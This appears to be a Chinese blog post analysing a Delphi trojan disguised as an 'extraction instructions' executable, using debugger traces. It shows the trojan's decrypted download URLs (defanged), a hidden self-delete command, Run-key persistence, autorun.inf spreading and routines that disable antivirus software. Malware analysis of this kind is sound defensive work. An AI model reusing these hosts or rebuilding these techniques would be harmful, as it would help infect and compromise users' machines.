样本:http://www.scanw.com/blog/archives/77 —–解压说明.exe
;*****************************************************************************************
;**********************************thanks cyto******************************************
;*****************************************************************************************
1.OEP
OEP被改动过,EP:
004115A1 > $ 55 push ebp
004115A2 . 8BEC mov ebp,esp
004115A4 . 50 push eax
004115A5 . 58 pop eax
004115A6 . 90 nop
004115A7 . 90 nop
004115A8 . 41 inc ecx
004115A9 . 49 dec ecx
004115AA . 90 nop
004115AB . 90 nop
004115AC . 50 push eax
004115AD . 58 pop eax
004115AE . 90 nop
004115AF . 90 nop
004115B0 . 90 nop
004115B1 . 90 nop
004115B2 . EB 29 jmp short 解压说明.004115DD
再往下就是Borland Delphi的OEP特征:55 8B EC B9 34 00 00 00
004115B8 > /55 push ebp
004115B9 . |8BEC mov ebp,esp
004115BB . |B9 34000000 mov ecx,34
004115C0 .^|E9 8BEEFFFF jmp 解压说明.00410450
这里是foep:
00410450 > /6A 00 push 0 ; fOEP
00410452 . |6A 00 push 0
00410454 . |49 dec ecx
00410455 .^ 75 F9 jnz short 解压说明.00410450
00410457 . |51 push ecx
00410458 . |53 push ebx
可以看到前面8个字节被nop掉了,补上:
55 8B EC B9 34 00 00 00
修正.
2.解密字符串:004104C1 E8 8E7DFFFF call 解压说明.00408254
call 0040654C
堆栈 ss:[0012D578]=00C8290C, (ASCII “hxxp://www.webweb.com/ReadDown.txt”)
edx=00C828A8, (ASCII “mvqr?-*uru+u“rgg,fmh-WgdfAmrl+v}v”)
堆栈 ss:[0012D568]=00C829C0, (ASCII “hxxp://www.cbirds.cn/qqwww/uu.exe”)
edx=00C82970, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*wp,`z`”)
堆栈 ss:[0012D560]=00C82A40, (ASCII “hxxp://www.cbirds.cn/qqwww/1.exe”)
edx=00C829F0, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*3+g}g”)
堆栈 ss:[0012D558]=00C82AC0, (ASCII “hxxp://www.cbirds.cn/qqwww/2.exe”)
edx=00C82A70, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*0+g}g”)
堆栈 ss:[0012D550]=00C82B40, (ASCII “hxxp://www.cbirds.cn/qqwww/3.exe”)
edx=00C82AF0, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*1+g}g”)
堆栈 ss:[0012D520]=00C82D50, (ASCII “hxxp://www.cbirds.cn/qqwww/4.exe”)
edx=00C82CEC, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*6+g}g”)
堆栈 ss:[0012D518]=00C82DE4, (ASCII “hxxp://www.cbirds.cn/qqwww/5.exe”)
edx=00C82D80, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*7+g}g”)
3.运行中的进程名是否是:(GOODIYA.EXE)
00410518 8B55 E0 mov edx,dword ptr ss:[ebp-20]
0041051B 58 pop eax
0041051C E8 C338FFFF call 解压说明.00403DE4
00410521 0F85 A5010000 jnz 解压说明.004106CC
一个个分区来:
堆栈 ss:[0012FF98]=00C82FEC, (ASCII “C:\GOODIYA.EXE”)
…
堆栈 ss:[0012FF98]=00C8375C, (ASCII “Z:\GOODIYA.EXE”)
是的话就直接运行了.
4.比较进程是否是以下程序:
004107EB 8B55 88 mov edx,dword ptr ss:[ebp-78]
004107EE 58 pop eax
004107EF E8 F035FFFF call 解压说明.00403DE4
004107F4 0F84 16060000 je 解压说明.00410E10
C:\PROGRAM FILES\COMMON FILES\SYSTEM\PJNQBQE.EXE
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\MAUJQYF.EXE
不是的话就拷贝副本:
0012FDEC 00410CCD /CALL 到 CopyFileA 来自 解压说明.00410CC8
0012FDF0 00C80034 |ExistingFileName = “C:\Documents and Settings\gao1\桌面\解压说明.exe”
0012FDF4 00C80480 |NewFileName = “C:\Program Files\Common Files\System\pjnqbqe.exe”
0012FDF8 FFFFFFFF \FailIfExists = TRUE
0012FDEC 00410D17 /CALL 到 CopyFileA 来自 解压说明.00410D12
0012FDF0 00C80034 |ExistingFileName = “C:\Documents and Settings\gao1\桌面\解压说明.exe”
0012FDF4 00C80514 |NewFileName = “C:\Program Files\Common Files\Microsoft Shared\maujqyf.exe”
0012FDF8 FFFFFFFF \FailIfExists = TRUE
并执行:
0012FDF0 00410D54 /CALL 到 WinExec 来自 解压说明.00410D4F
0012FDF4 00C805A8 |CmdLine = “C:\Program Files\Common Files\System\pjnqbqe.exe”
0012FDF8 00000001 \ShowState = SW_SHOWNORMAL
0012FDF0 00410D91 /CALL 到 WinExec 来自 解压说明.00410D8C
0012FDF4 00C8063C |CmdLine = “C:\Program Files\Common Files\Microsoft Shared\maujqyf.exe”
0012FDF8 00000001 \ShowState = SW_SHOWNORMAL
删除自身:除根目录下的GOODIYA.EXE:
0012FCC8 00405FA9 /CALL 到 WinExec 来自 解压说明.00405FA4
0012FCCC 00C83D80 |CmdLine = “C:\WINNT\system32\cmd.exe /c del “C:\Documents and Settings\gao1\桌面\解压说明.exe”"
0012FCD0 00000000 \ShowState = SW_HIDE
5.PJNQBQE.EXE或MAUJQYF.EXE干的活:
5.1 如果是PJNQBQE.EXE:
0012FDE0 00411025 /CALL 到 CreateThread 来自 解压说明.00411020
0012FDE4 00000000 |pSecurity = NULL
0012FDE8 00000000 |StackSize = 0
0012FDEC 0040BDE0 |ThreadFunction = 解压说明.0040BDE0 ; 对付avp
0012FDF0 00000000 |pThreadParm = NULL
0012FDF4 00000000 |CreationFlags = 0
0012FDF8 004136DC \pThreadId = 解压说明.004136DC
0012FDE8 00411038 /CALL 到 SetTimer 来自 解压说明.00411033
0012FDEC 00000000 |hWnd = NULL
0012FDF0 00000000 |TimerID = 0
0012FDF4 00000514 |Timeout = 1300. ms
0012FDF8 0040FBC4 \Timerproc = 解压说明.0040FBC4 ; 写注册表
0040FDA4=解压说明.0040FDA4 (ASCII “Software\Microsoft\Windows\CurrentVersion\Run”)
0012FDE8 00411053 /CALL 到 SetTimer 来自 解压说明.0041104E
0012FDEC 00000000 |hWnd = NULL
0012FDF0 00000000 |TimerID = 0
0012FDF4 00001388 |Timeout = 5000. ms
0012FDF8 00410078 \Timerproc = 解压说明.00410078 ; 写autorun.inf及GOODIYA.EXE
0012FDE8 0041106E /CALL 到 SetTimer 来自 解压说明.00411069
0012FDEC 00000000 |hWnd = NULL
0012FDF0 00000000 |TimerID = 0
0012FDF4 00000898 |Timeout = 2200. ms
0012FDF8 00410090 \Timerproc = 解压说明.00410090 ; 过一堆的杀软
0012FDE8 004110A4 /CALL 到 SetTimer 来自 解压说明.0041109F
0012FDEC 00000000 |hWnd = NULL
0012FDF0 00000000 |TimerID = 0
0012FDF4 00000000 |Timeout = 0. ms
0012FDF8 0040B8E4 \Timerproc = 解压说明.0040B8E4 ; 下载病毒
5.2 如果是MAUJQYF.EXE的话:
004112EF A1 3C254100 mov eax,dword ptr ds:[41253C]
004112F4 50 push eax
004112F5 6A 00 push 0
004112F7 6A 00 push 0
004112F9 68 9CF34000 push 解压说明.0040F39C ; 过杀软
004112FE 6A 00 push 0
00411300 6A 00 push 0
00411302 E8 B533FFFF call <jmp.&kernel32.CreateThread>
00411307 A1 44254100 mov eax,dword ptr ds:[412544]
0041130C 50 push eax
0041130D 6A 00 push 0
0041130F 6A 00 push 0
00411311 68 04B24000 push 解压说明.0040B204 ; 下载文件,运行后再删除
00411316 6A 00 push 0
00411318 6A 00 push 0
0041131A E8 9D33FFFF call <jmp.&kernel32.CreateThread>
上面解密的地址一个个下载,如下:
011DFF60 00C84050 ASCII “hxxp://www.cbirds.cn/qqwww/uu.exe”
011DFF64 00C80210 ASCII “C:\Program Files\1Awww.cbirds.cn/qqwww/uu.exe”
0041131F 68 28FE4000 push 解压说明.0040FE28 ; 执行PJNQBQE.EXE,关闭taskmgr.exe窗口
00411324 68 14050000 push 514
00411329 6A 00 push 0
0041132B 6A 00 push 0
0041132D E8 FA34FFFF call <jmp.&user32.SetTimer>
00411332 8B15 40254100 mov edx,dword ptr ds:[412540] ; 解压说明.00413ED0
00411338 8902 mov dword ptr ds:[edx],eax
0041133A 68 6C004100 push 解压说明.0041006C ; 各分区写入autorun.inf及GOODIYA.EXE
0041133F 68 70170000 push 1770
00411344 6A 00 push 0
00411346 6A 00 push 0
00411348 E8 DF34FFFF call <jmp.&user32.SetTimer>
0041134D 8B15 50254100 mov edx,dword ptr ds:[412550] ; 解压说明.00413ED4
00411353 8902 mov dword ptr ds:[edx],eax
00411355 68 60034100 push 解压说明.00410360 ; 过杀软
0041135A 68 E8030000 push 3E8
0041135F 6A 00 push 0
00411361 6A 00 push 0
00411363 E8 C434FFFF call <jmp.&user32.SetTimer>
Popularity: 28% [?]